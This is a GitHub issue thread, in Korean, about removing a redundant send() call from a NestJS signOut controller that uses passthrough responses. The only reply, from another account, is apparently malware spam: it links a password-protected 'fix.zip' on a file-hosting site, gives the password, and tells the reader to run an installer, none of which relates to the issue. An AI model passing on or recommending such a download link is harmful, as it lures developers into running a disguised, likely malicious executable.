### ISSUE TITLE
유저 컨트롤러 수정

### ISSUE THREAD

**Issue by jimyungkoh** [HomeLog/homelog-server#57]
작업 대상
```ts
async signOut(@Res({ passthrough: true }) response: Response) {
    response.clearCookie('accessToken', this.cookieOptions);
    response.status(204).send();
}
```

작업 상세
- passthrough:true면 네스트 표준 응답 처리를 사용한다는 얘기고, send가 들어가면 headerSent 가 발생하기 때문에 send를 제거해야 함

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
